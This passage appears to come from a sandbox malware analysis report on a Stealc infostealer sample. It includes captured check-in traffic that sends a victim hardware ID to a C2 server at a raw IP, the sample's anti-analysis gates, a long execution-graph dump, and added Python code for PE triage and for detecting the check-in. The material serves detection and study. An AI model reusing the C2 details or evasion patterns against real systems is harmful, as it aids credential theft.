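                           0x400000, sect_align, 0x200).ljust(224, b"\0")       # PE32, ImageBase 0x400000
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    headers = dos + b"PE\0\0" + coff + optional + sect_hdrs
    return headers.ljust(headers_size, b"\0") + body


if __name__ == "__main__":
    for finding in triage(parse_pe(build_sample_pe())):
        print(finding)
```

Run it against the real file with parse_pe(open(path, "rb").read()) and the findings reproduce the table above: entry point in .taggant, five RWX sections, two nameless sections and one near-8.0 section. The entropy threshold deliberately ignores sections under 0x200 bytes, because a handful of bytes cannot show meaningful entropy either way.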
Suricata IDS alert
Timestamp | SID | Signature | Severity | Source | Destination | Protocol
2024-10-28T11:22:06.086992+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5:49704 | 185.215.113.206:80 | TCP
TCP packets (timestamp, source -> destination)
Oct 28, 2024 11:22:04.866813898 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:04.872369051 CET | 185.215.113.206:80 -> 192.168.2.5:49704
Oct 28, 2024 11:22:04.872483969 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:04.872705936 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:04.878412962 CET | 185.215.113.206:80 -> 192.168.2.5:49704
Oct 28, 2024 11:22:05.789527893 CET | 185.215.113.206:80 -> 192.168.2.5:49704
Oct 28, 2024 11:22:05.789732933 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:05.794266939 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:05.799633026 CET | 185.215.113.206:80 -> 192.168.2.5:49704
Oct 28, 2024 11:22:06.086846113 CET | 185.215.113.206:80 -> 192.168.2.5:49704
Oct 28, 2024 11:22:06.086992025 CET | 192.168.2.5:49704 -> 185.215.113.206:80
Oct 28, 2024 11:22:08.760154963 CET | 192.168.2.5:49704 -> 185.215.113.206:80
HTTP hosts contacted: 185.215.113.206
HTTP session 0: 192.168.2.5:49704 -> 185.215.113.206:80, PID 6528, C:\Users\user\Desktop\file.exe
HTTP exchange (timestamp, bytes transferred, direction, data)

Oct 28, 2024 11:22:04.872705936 CET | 90 bytes | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Oct 28, 2024 11:22:05.789527893 CET | 203 bytes | IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 10:22:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 28, 2024 11:22:05.794266939 CET | 412 bytes | OUT
POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache

Body (210 bytes, decoded from the raw hex; every line ends in CR LF):
------HJDBFBKKJDHJKECBGDAK
Content-Disposition: form-data; name="hwid"

9AFA67DB7218194301792
------HJDBFBKKJDHJKECBGDAK
Content-Disposition: form-data; name="build"

tale
------HJDBFBKKJDHJKECBGDAK--

Oct 28, 2024 11:22:06.086846113 CET | 210 bytes | IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 10:22:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Body: YmxvY2s= (base64 of "block")

The check-in therefore consists of a bare GET / probe followed by one multipart POST carrying only the victim identifier (hwid) and the build tag (tale) to a .php endpoint named by 16 hex characters on a raw IP; the server answered "block" and the capture shows no further request, the session's last packet being the client's at 11:22:08.760. No configuration, module download or exfiltration traffic was observed in this run.
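The exchange above, as an added example that is not part of the report, of Joe Sandbox or of the sample: a standard-library Python parser that splits the captured check-in, pulls the hwid and build fields out of the multipart body, decodes the base64 reply, and applies a triage heuristic modelled on what this session shows. The request and reply bytes are reconstructed from the report's Data Raw hex (the boundary, hwid and build values are the captured ones); the heuristic is this example's own and is not the content of Suricata rule 2044243, which the report does not reproduce.

```python
"""Parse and triage the Stealc C2 check-in captured in this report.

Added example (not code from the report, Joe Sandbox or the sample).
Standard library only. The request and reply below are reconstructed
from the report's HTTP session; everything else is this example's own.
"""
import base64
import re

# Reconstructed from the report's "Data Raw" hex; CR LF line endings preserved.
CHECKIN_REQUEST = (
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------HJDBFBKKJDHJKECBGDAK\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"9AFA67DB7218194301792\r\n"
    b"------HJDBFBKKJDHJKECBGDAK\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"tale\r\n"
    b"------HJDBFBKKJDHJKECBGDAK--\r\n"
)
# Body of the 8-byte reply the server returned (Content-Length: 8).
CHECKIN_REPLY_BODY = b"YmxvY2s="


def split_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body (RFC 2046 framing)."""
    delimiter = b"--" + boundary.encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        part_headers, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'[;\s]name="([^"]*)"', part_headers)
        if match:
            fields[match.group(1).decode("latin-1")] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def parse_checkin(raw_request: bytes) -> dict:
    """Pull method, path, host and the multipart fields out of a captured request."""
    start_line, headers, body = split_http(raw_request)
    method, path, _ = start_line.split(" ", 2)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;]+)", ctype)
    fields = parse_multipart(body, m.group(1).strip()) if m else {}
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "content_type": ctype, "body_len": len(body), "fields": fields}


def decode_reply(body: bytes) -> str:
    """The reply body is base64; the captured 'YmxvY2s=' decodes to 'block'."""
    return base64.b64decode(body, validate=True).decode("latin-1")


def looks_like_stealc_checkin(checkin: dict) -> bool:
    """Triage heuristic derived from this session (this example's own, not the
    ET/Sekoia rule): POST to /<16 hex chars>.php on a bare-IP Host with a
    multipart body carrying exactly the fields hwid and build."""
    bare_ip = re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}(:\d+)?", checkin["host"]) is not None
    return (checkin["method"] == "POST"
            and re.fullmatch(r"/[0-9a-f]{16}\.php", checkin["path"]) is not None
            and bare_ip
            and checkin["content_type"].startswith("multipart/form-data")
            and set(checkin["fields"]) == {"hwid", "build"})


if __name__ == "__main__":
    info = parse_checkin(CHECKIN_REQUEST)
    print(info["fields"], "match:", looks_like_stealc_checkin(info))
    print("reply:", decode_reply(CHECKIN_REPLY_BODY))
```

The heuristic keys on the shape of the request rather than on the specific boundary string or hwid, both of which vary per victim; a benign multipart upload to a named host with a file field does not match. Base64 with validate=True rejects replies that are not clean base64, which is the right failure mode for a decoder fed hostile server output.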



                                Target ID:0
                                Start time:06:22:01
                                Start date:28/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x7e0000
                                File size:2'108'416 bytes
                                MD5 hash:FAE77EE19103237B52405630DE9AA6A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.9%
                                  Total number of Nodes:1327
                                  Total number of Limit Nodes:24
Execution graph (the rendered node/edge listing is omitted; the call sequences it contains are summarised below with the function addresses the graph uses, runtime image base 0x7e0000):
• 7e22a0 and 7e26f0: long straight-line chains of calls into 7e4610 (RtlAllocateHeap followed by VirtualProtect), i.e. heap buffers allocated and re-protected one after another before any other activity.
• 7f9bb0: reads the PEB (7f9aa0), then five LoadLibraryA calls and a run of GetProcAddress calls: the API set is resolved at run time, which is why the static import table holds only kernel32!lstrcpy (wrapped at 7faa50/7faa8e).
• 7e11d0: environment gates, each with its own ExitProcess branch: GetSystemInfo (7e1160); GetCurrentProcess + VirtualAllocExNuma (7e1110) followed by VirtualAlloc/VirtualFree (7e10a0); GlobalMemoryStatusEx (7f8b40) followed by a 64-bit division (__aulldiv) and a conditional ExitProcess; GetUserDefaultLangID (7f6a10) with five distinct ExitProcess exits, which is the locale check the signature "Found evasive API chain (may stop execution after checking locale)" refers to.
• 7f79e0 and 7f7a70: GetProcessHeap + RtlAllocateHeap, then GetUserNameA and GetComputerNameA; 7f7690: GetWindowsDirectoryA.
• 7f6bc0: GetSystemTime, sscanf, SystemTimeToFileTime twice, then a compare with an ExitProcess branch, the shape of an expiry-date check against an embedded date string.
• 7f6d62: OpenEventA; if the event already exists, CloseHandle + Sleep and retry, otherwise CreateEventA; 7f6db6: CloseHandle + ExitProcess. A named event is used as a single-instance guard.
• 7facc0, 7fabb0, 7faab0, 7fab30: lstrlen / lstrcpy / lstrcat wrappers that assemble strings piece by piece; the StrCmpCA chains at 7f0fc0, 7f1170 and 7f13c0 and the large collector routines (7f08a0 with 288 API calls, 7f1c60 with 115, 7e7770 with 108, 7f49d0 with 88, 7e1ec0 with 59, and others) are reached through them.
API calls 38313->38314 38315 7e2e89 38314->38315 38316 7e4610 2 API calls 38315->38316 38317 7e2ea2 38316->38317 38318 7e4610 2 API calls 38317->38318 38319 7e2ebb 38318->38319 38320 7e4610 2 API calls 38319->38320 38321 7e2ed4 38320->38321 38322 7e4610 2 API calls 38321->38322 38323 7e2eed 38322->38323 38324 7e4610 2 API calls 38323->38324 38325 7e2f06 38324->38325 38326 7e4610 2 API calls 38325->38326 38327 7e2f1f 38326->38327 38328 7e4610 2 API calls 38327->38328 38329 7e2f38 38328->38329 38330 7e4610 2 API calls 38329->38330 38331 7e2f51 38330->38331 38332 7e4610 2 API calls 38331->38332 38333 7e2f6a 38332->38333 38334 7e4610 2 API calls 38333->38334 38335 7e2f83 38334->38335 38336 7e4610 2 API calls 38335->38336 38337 7e2f9c 38336->38337 38338 7e4610 2 API calls 38337->38338 38339 7e2fb5 38338->38339 38340 7e4610 2 API calls 38339->38340 38341 7e2fce 38340->38341 38342 7e4610 2 API calls 38341->38342 38343 7e2fe7 38342->38343 38344 7e4610 2 API calls 38343->38344 38345 7e3000 38344->38345 38346 7e4610 2 API calls 38345->38346 38347 7e3019 38346->38347 38348 7e4610 2 API calls 38347->38348 38349 7e3032 38348->38349 38350 7e4610 2 API calls 38349->38350 38351 7e304b 38350->38351 38352 7e4610 2 API calls 38351->38352 38353 7e3064 38352->38353 38354 7e4610 2 API calls 38353->38354 38355 7e307d 38354->38355 38356 7e4610 2 API calls 38355->38356 38357 7e3096 38356->38357 38358 7e4610 2 API calls 38357->38358 38359 7e30af 38358->38359 38360 7e4610 2 API calls 38359->38360 38361 7e30c8 38360->38361 38362 7e4610 2 API calls 38361->38362 38363 7e30e1 38362->38363 38364 7e4610 2 API calls 38363->38364 38365 7e30fa 38364->38365 38366 7e4610 2 API calls 38365->38366 38367 7e3113 38366->38367 38368 7e4610 2 API calls 38367->38368 38369 7e312c 38368->38369 38370 7e4610 2 API calls 38369->38370 38371 7e3145 38370->38371 38372 7e4610 2 API calls 38371->38372 38373 7e315e 38372->38373 38374 7e4610 2 API calls 38373->38374 38375 7e3177 38374->38375 38376 7e4610 2 API calls 
38375->38376 38377 7e3190 38376->38377 38378 7e4610 2 API calls 38377->38378 38379 7e31a9 38378->38379 38380 7e4610 2 API calls 38379->38380 38381 7e31c2 38380->38381 38382 7e4610 2 API calls 38381->38382 38383 7e31db 38382->38383 38384 7e4610 2 API calls 38383->38384 38385 7e31f4 38384->38385 38386 7e4610 2 API calls 38385->38386 38387 7e320d 38386->38387 38388 7e4610 2 API calls 38387->38388 38389 7e3226 38388->38389 38390 7e4610 2 API calls 38389->38390 38391 7e323f 38390->38391 38392 7e4610 2 API calls 38391->38392 38393 7e3258 38392->38393 38394 7e4610 2 API calls 38393->38394 38395 7e3271 38394->38395 38396 7e4610 2 API calls 38395->38396 38397 7e328a 38396->38397 38398 7e4610 2 API calls 38397->38398 38399 7e32a3 38398->38399 38400 7e4610 2 API calls 38399->38400 38401 7e32bc 38400->38401 38402 7e4610 2 API calls 38401->38402 38403 7e32d5 38402->38403 38404 7e4610 2 API calls 38403->38404 38405 7e32ee 38404->38405 38406 7e4610 2 API calls 38405->38406 38407 7e3307 38406->38407 38408 7e4610 2 API calls 38407->38408 38409 7e3320 38408->38409 38410 7e4610 2 API calls 38409->38410 38411 7e3339 38410->38411 38412 7e4610 2 API calls 38411->38412 38413 7e3352 38412->38413 38414 7e4610 2 API calls 38413->38414 38415 7e336b 38414->38415 38416 7e4610 2 API calls 38415->38416 38417 7e3384 38416->38417 38418 7e4610 2 API calls 38417->38418 38419 7e339d 38418->38419 38420 7e4610 2 API calls 38419->38420 38421 7e33b6 38420->38421 38422 7e4610 2 API calls 38421->38422 38423 7e33cf 38422->38423 38424 7e4610 2 API calls 38423->38424 38425 7e33e8 38424->38425 38426 7e4610 2 API calls 38425->38426 38427 7e3401 38426->38427 38428 7e4610 2 API calls 38427->38428 38429 7e341a 38428->38429 38430 7e4610 2 API calls 38429->38430 38431 7e3433 38430->38431 38432 7e4610 2 API calls 38431->38432 38433 7e344c 38432->38433 38434 7e4610 2 API calls 38433->38434 38435 7e3465 38434->38435 38436 7e4610 2 API calls 38435->38436 38437 7e347e 38436->38437 38438 7e4610 2 API calls 38437->38438 
38439 7e3497 38438->38439 38440 7e4610 2 API calls 38439->38440 38441 7e34b0 38440->38441 38442 7e4610 2 API calls 38441->38442 38443 7e34c9 38442->38443 38444 7e4610 2 API calls 38443->38444 38445 7e34e2 38444->38445 38446 7e4610 2 API calls 38445->38446 38447 7e34fb 38446->38447 38448 7e4610 2 API calls 38447->38448 38449 7e3514 38448->38449 38450 7e4610 2 API calls 38449->38450 38451 7e352d 38450->38451 38452 7e4610 2 API calls 38451->38452 38453 7e3546 38452->38453 38454 7e4610 2 API calls 38453->38454 38455 7e355f 38454->38455 38456 7e4610 2 API calls 38455->38456 38457 7e3578 38456->38457 38458 7e4610 2 API calls 38457->38458 38459 7e3591 38458->38459 38460 7e4610 2 API calls 38459->38460 38461 7e35aa 38460->38461 38462 7e4610 2 API calls 38461->38462 38463 7e35c3 38462->38463 38464 7e4610 2 API calls 38463->38464 38465 7e35dc 38464->38465 38466 7e4610 2 API calls 38465->38466 38467 7e35f5 38466->38467 38468 7e4610 2 API calls 38467->38468 38469 7e360e 38468->38469 38470 7e4610 2 API calls 38469->38470 38471 7e3627 38470->38471 38472 7e4610 2 API calls 38471->38472 38473 7e3640 38472->38473 38474 7e4610 2 API calls 38473->38474 38475 7e3659 38474->38475 38476 7e4610 2 API calls 38475->38476 38477 7e3672 38476->38477 38478 7e4610 2 API calls 38477->38478 38479 7e368b 38478->38479 38480 7e4610 2 API calls 38479->38480 38481 7e36a4 38480->38481 38482 7e4610 2 API calls 38481->38482 38483 7e36bd 38482->38483 38484 7e4610 2 API calls 38483->38484 38485 7e36d6 38484->38485 38486 7e4610 2 API calls 38485->38486 38487 7e36ef 38486->38487 38488 7e4610 2 API calls 38487->38488 38489 7e3708 38488->38489 38490 7e4610 2 API calls 38489->38490 38491 7e3721 38490->38491 38492 7e4610 2 API calls 38491->38492 38493 7e373a 38492->38493 38494 7e4610 2 API calls 38493->38494 38495 7e3753 38494->38495 38496 7e4610 2 API calls 38495->38496 38497 7e376c 38496->38497 38498 7e4610 2 API calls 38497->38498 38499 7e3785 38498->38499 38500 7e4610 2 API calls 38499->38500 38501 7e379e 
38500->38501 38502 7e4610 2 API calls 38501->38502 38503 7e37b7 38502->38503 38504 7e4610 2 API calls 38503->38504 38505 7e37d0 38504->38505 38506 7e4610 2 API calls 38505->38506 38507 7e37e9 38506->38507 38508 7e4610 2 API calls 38507->38508 38509 7e3802 38508->38509 38510 7e4610 2 API calls 38509->38510 38511 7e381b 38510->38511 38512 7e4610 2 API calls 38511->38512 38513 7e3834 38512->38513 38514 7e4610 2 API calls 38513->38514 38515 7e384d 38514->38515 38516 7e4610 2 API calls 38515->38516 38517 7e3866 38516->38517 38518 7e4610 2 API calls 38517->38518 38519 7e387f 38518->38519 38520 7e4610 2 API calls 38519->38520 38521 7e3898 38520->38521 38522 7e4610 2 API calls 38521->38522 38523 7e38b1 38522->38523 38524 7e4610 2 API calls 38523->38524 38525 7e38ca 38524->38525 38526 7e4610 2 API calls 38525->38526 38527 7e38e3 38526->38527 38528 7e4610 2 API calls 38527->38528 38529 7e38fc 38528->38529 38530 7e4610 2 API calls 38529->38530 38531 7e3915 38530->38531 38532 7e4610 2 API calls 38531->38532 38533 7e392e 38532->38533 38534 7e4610 2 API calls 38533->38534 38535 7e3947 38534->38535 38536 7e4610 2 API calls 38535->38536 38537 7e3960 38536->38537 38538 7e4610 2 API calls 38537->38538 38539 7e3979 38538->38539 38540 7e4610 2 API calls 38539->38540 38541 7e3992 38540->38541 38542 7e4610 2 API calls 38541->38542 38543 7e39ab 38542->38543 38544 7e4610 2 API calls 38543->38544 38545 7e39c4 38544->38545 38546 7e4610 2 API calls 38545->38546 38547 7e39dd 38546->38547 38548 7e4610 2 API calls 38547->38548 38549 7e39f6 38548->38549 38550 7e4610 2 API calls 38549->38550 38551 7e3a0f 38550->38551 38552 7e4610 2 API calls 38551->38552 38553 7e3a28 38552->38553 38554 7e4610 2 API calls 38553->38554 38555 7e3a41 38554->38555 38556 7e4610 2 API calls 38555->38556 38557 7e3a5a 38556->38557 38558 7e4610 2 API calls 38557->38558 38559 7e3a73 38558->38559 38560 7e4610 2 API calls 38559->38560 38561 7e3a8c 38560->38561 38562 7e4610 2 API calls 38561->38562 38563 7e3aa5 38562->38563 
38564 7e4610 2 API calls 38563->38564 38565 7e3abe 38564->38565 38566 7e4610 2 API calls 38565->38566 38567 7e3ad7 38566->38567 38568 7e4610 2 API calls 38567->38568 38569 7e3af0 38568->38569 38570 7e4610 2 API calls 38569->38570 38571 7e3b09 38570->38571 38572 7e4610 2 API calls 38571->38572 38573 7e3b22 38572->38573 38574 7e4610 2 API calls 38573->38574 38575 7e3b3b 38574->38575 38576 7e4610 2 API calls 38575->38576 38577 7e3b54 38576->38577 38578 7e4610 2 API calls 38577->38578 38579 7e3b6d 38578->38579 38580 7e4610 2 API calls 38579->38580 38581 7e3b86 38580->38581 38582 7e4610 2 API calls 38581->38582 38583 7e3b9f 38582->38583 38584 7e4610 2 API calls 38583->38584 38585 7e3bb8 38584->38585 38586 7e4610 2 API calls 38585->38586 38587 7e3bd1 38586->38587 38588 7e4610 2 API calls 38587->38588 38589 7e3bea 38588->38589 38590 7e4610 2 API calls 38589->38590 38591 7e3c03 38590->38591 38592 7e4610 2 API calls 38591->38592 38593 7e3c1c 38592->38593 38594 7e4610 2 API calls 38593->38594 38595 7e3c35 38594->38595 38596 7e4610 2 API calls 38595->38596 38597 7e3c4e 38596->38597 38598 7e4610 2 API calls 38597->38598 38599 7e3c67 38598->38599 38600 7e4610 2 API calls 38599->38600 38601 7e3c80 38600->38601 38602 7e4610 2 API calls 38601->38602 38603 7e3c99 38602->38603 38604 7e4610 2 API calls 38603->38604 38605 7e3cb2 38604->38605 38606 7e4610 2 API calls 38605->38606 38607 7e3ccb 38606->38607 38608 7e4610 2 API calls 38607->38608 38609 7e3ce4 38608->38609 38610 7e4610 2 API calls 38609->38610 38611 7e3cfd 38610->38611 38612 7e4610 2 API calls 38611->38612 38613 7e3d16 38612->38613 38614 7e4610 2 API calls 38613->38614 38615 7e3d2f 38614->38615 38616 7e4610 2 API calls 38615->38616 38617 7e3d48 38616->38617 38618 7e4610 2 API calls 38617->38618 38619 7e3d61 38618->38619 38620 7e4610 2 API calls 38619->38620 38621 7e3d7a 38620->38621 38622 7e4610 2 API calls 38621->38622 38623 7e3d93 38622->38623 38624 7e4610 2 API calls 38623->38624 38625 7e3dac 38624->38625 38626 7e4610 2 
API calls 38625->38626 38627 7e3dc5 38626->38627 38628 7e4610 2 API calls 38627->38628 38629 7e3dde 38628->38629 38630 7e4610 2 API calls 38629->38630 38631 7e3df7 38630->38631 38632 7e4610 2 API calls 38631->38632 38633 7e3e10 38632->38633 38634 7e4610 2 API calls 38633->38634 38635 7e3e29 38634->38635 38636 7e4610 2 API calls 38635->38636 38637 7e3e42 38636->38637 38638 7e4610 2 API calls 38637->38638 38639 7e3e5b 38638->38639 38640 7e4610 2 API calls 38639->38640 38641 7e3e74 38640->38641 38642 7e4610 2 API calls 38641->38642 38643 7e3e8d 38642->38643 38644 7e4610 2 API calls 38643->38644 38645 7e3ea6 38644->38645 38646 7e4610 2 API calls 38645->38646 38647 7e3ebf 38646->38647 38648 7e4610 2 API calls 38647->38648 38649 7e3ed8 38648->38649 38650 7e4610 2 API calls 38649->38650 38651 7e3ef1 38650->38651 38652 7e4610 2 API calls 38651->38652 38653 7e3f0a 38652->38653 38654 7e4610 2 API calls 38653->38654 38655 7e3f23 38654->38655 38656 7e4610 2 API calls 38655->38656 38657 7e3f3c 38656->38657 38658 7e4610 2 API calls 38657->38658 38659 7e3f55 38658->38659 38660 7e4610 2 API calls 38659->38660 38661 7e3f6e 38660->38661 38662 7e4610 2 API calls 38661->38662 38663 7e3f87 38662->38663 38664 7e4610 2 API calls 38663->38664 38665 7e3fa0 38664->38665 38666 7e4610 2 API calls 38665->38666 38667 7e3fb9 38666->38667 38668 7e4610 2 API calls 38667->38668 38669 7e3fd2 38668->38669 38670 7e4610 2 API calls 38669->38670 38671 7e3feb 38670->38671 38672 7e4610 2 API calls 38671->38672 38673 7e4004 38672->38673 38674 7e4610 2 API calls 38673->38674 38675 7e401d 38674->38675 38676 7e4610 2 API calls 38675->38676 38677 7e4036 38676->38677 38678 7e4610 2 API calls 38677->38678 38679 7e404f 38678->38679 38680 7e4610 2 API calls 38679->38680 38681 7e4068 38680->38681 38682 7e4610 2 API calls 38681->38682 38683 7e4081 38682->38683 38684 7e4610 2 API calls 38683->38684 38685 7e409a 38684->38685 38686 7e4610 2 API calls 38685->38686 38687 7e40b3 38686->38687 38688 7e4610 2 API calls 
38687->38688 38689 7e40cc 38688->38689 38690 7e4610 2 API calls 38689->38690 38691 7e40e5 38690->38691 38692 7e4610 2 API calls 38691->38692 38693 7e40fe 38692->38693 38694 7e4610 2 API calls 38693->38694 38695 7e4117 38694->38695 38696 7e4610 2 API calls 38695->38696 38697 7e4130 38696->38697 38698 7e4610 2 API calls 38697->38698 38699 7e4149 38698->38699 38700 7e4610 2 API calls 38699->38700 38701 7e4162 38700->38701 38702 7e4610 2 API calls 38701->38702 38703 7e417b 38702->38703 38704 7e4610 2 API calls 38703->38704 38705 7e4194 38704->38705 38706 7e4610 2 API calls 38705->38706 38707 7e41ad 38706->38707 38708 7e4610 2 API calls 38707->38708 38709 7e41c6 38708->38709 38710 7e4610 2 API calls 38709->38710 38711 7e41df 38710->38711 38712 7e4610 2 API calls 38711->38712 38713 7e41f8 38712->38713 38714 7e4610 2 API calls 38713->38714 38715 7e4211 38714->38715 38716 7e4610 2 API calls 38715->38716 38717 7e422a 38716->38717 38718 7e4610 2 API calls 38717->38718 38719 7e4243 38718->38719 38720 7e4610 2 API calls 38719->38720 38721 7e425c 38720->38721 38722 7e4610 2 API calls 38721->38722 38723 7e4275 38722->38723 38724 7e4610 2 API calls 38723->38724 38725 7e428e 38724->38725 38726 7e4610 2 API calls 38725->38726 38727 7e42a7 38726->38727 38728 7e4610 2 API calls 38727->38728 38729 7e42c0 38728->38729 38730 7e4610 2 API calls 38729->38730 38731 7e42d9 38730->38731 38732 7e4610 2 API calls 38731->38732 38733 7e42f2 38732->38733 38734 7e4610 2 API calls 38733->38734 38735 7e430b 38734->38735 38736 7e4610 2 API calls 38735->38736 38737 7e4324 38736->38737 38738 7e4610 2 API calls 38737->38738 38739 7e433d 38738->38739 38740 7e4610 2 API calls 38739->38740 38741 7e4356 38740->38741 38742 7e4610 2 API calls 38741->38742 38743 7e436f 38742->38743 38744 7e4610 2 API calls 38743->38744 38745 7e4388 38744->38745 38746 7e4610 2 API calls 38745->38746 38747 7e43a1 38746->38747 38748 7e4610 2 API calls 38747->38748 38749 7e43ba 38748->38749 38750 7e4610 2 API calls 38749->38750 
38751 7e43d3 38750->38751 38752 7e4610 2 API calls 38751->38752 38753 7e43ec 38752->38753 38754 7e4610 2 API calls 38753->38754 38755 7e4405 38754->38755 38756 7e4610 2 API calls 38755->38756 38757 7e441e 38756->38757 38758 7e4610 2 API calls 38757->38758 38759 7e4437 38758->38759 38760 7e4610 2 API calls 38759->38760 38761 7e4450 38760->38761 38762 7e4610 2 API calls 38761->38762 38763 7e4469 38762->38763 38764 7e4610 2 API calls 38763->38764 38765 7e4482 38764->38765 38766 7e4610 2 API calls 38765->38766 38767 7e449b 38766->38767 38768 7e4610 2 API calls 38767->38768 38769 7e44b4 38768->38769 38770 7e4610 2 API calls 38769->38770 38771 7e44cd 38770->38771 38772 7e4610 2 API calls 38771->38772 38773 7e44e6 38772->38773 38774 7e4610 2 API calls 38773->38774 38775 7e44ff 38774->38775 38776 7e4610 2 API calls 38775->38776 38777 7e4518 38776->38777 38778 7e4610 2 API calls 38777->38778 38779 7e4531 38778->38779 38780 7e4610 2 API calls 38779->38780 38781 7e454a 38780->38781 38782 7e4610 2 API calls 38781->38782 38783 7e4563 38782->38783 38784 7e4610 2 API calls 38783->38784 38785 7e457c 38784->38785 38786 7e4610 2 API calls 38785->38786 38787 7e4595 38786->38787 38788 7e4610 2 API calls 38787->38788 38789 7e45ae 38788->38789 38790 7e4610 2 API calls 38789->38790 38791 7e45c7 38790->38791 38792 7e4610 2 API calls 38791->38792 38793 7e45e0 38792->38793 38794 7e4610 2 API calls 38793->38794 38795 7e45f9 38794->38795 38796 7f9f20 38795->38796 38797 7fa346 8 API calls 38796->38797 38798 7f9f30 43 API calls 38796->38798 38799 7fa3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38797->38799 38800 7fa456 38797->38800 38798->38797 38799->38800 38801 7fa526 38800->38801 38802 7fa463 8 API calls 38800->38802 38803 7fa52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38801->38803 38804 7fa5a8 38801->38804 38802->38801 38803->38804 38805 7fa647 38804->38805 38806 7fa5b5 6 API calls 38804->38806 38807 7fa72f 38805->38807 
38808 7fa654 9 API calls 38805->38808 38806->38805 38809 7fa738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38807->38809 38810 7fa7b2 38807->38810 38808->38807 38809->38810 38811 7fa7ec 38810->38811 38812 7fa7bb GetProcAddress GetProcAddress 38810->38812 38813 7fa825 38811->38813 38814 7fa7f5 GetProcAddress GetProcAddress 38811->38814 38812->38811 38815 7fa922 38813->38815 38816 7fa832 10 API calls 38813->38816 38814->38813 38817 7fa98d 38815->38817 38818 7fa92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38815->38818 38816->38815 38819 7fa9ae 38817->38819 38820 7fa996 GetProcAddress 38817->38820 38818->38817 38821 7f5ef3 38819->38821 38822 7fa9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38819->38822 38820->38819 38823 7e1590 38821->38823 38822->38821 39093 7e16b0 38823->39093 38826 7faab0 lstrcpy 38827 7e15b5 38826->38827 38828 7faab0 lstrcpy 38827->38828 38829 7e15c7 38828->38829 38830 7faab0 lstrcpy 38829->38830 38831 7e15d9 38830->38831 38832 7faab0 lstrcpy 38831->38832 38833 7e1663 38832->38833 38834 7f5760 38833->38834 38835 7f5771 38834->38835 38836 7fab30 2 API calls 38835->38836 38837 7f577e 38836->38837 38838 7fab30 2 API calls 38837->38838 38839 7f578b 38838->38839 38840 7fab30 2 API calls 38839->38840 38841 7f5798 38840->38841 38842 7faa50 lstrcpy 38841->38842 38843 7f57a5 38842->38843 38844 7faa50 lstrcpy 38843->38844 38845 7f57b2 38844->38845 38846 7faa50 lstrcpy 38845->38846 38847 7f57bf 38846->38847 38848 7faa50 lstrcpy 38847->38848 38884 7f57cc 38848->38884 38849 7faa50 lstrcpy 38849->38884 38850 7f5893 StrCmpCA 38850->38884 38851 7f58f0 StrCmpCA 38852 7f5a2c 38851->38852 38851->38884 38853 7fabb0 lstrcpy 38852->38853 38854 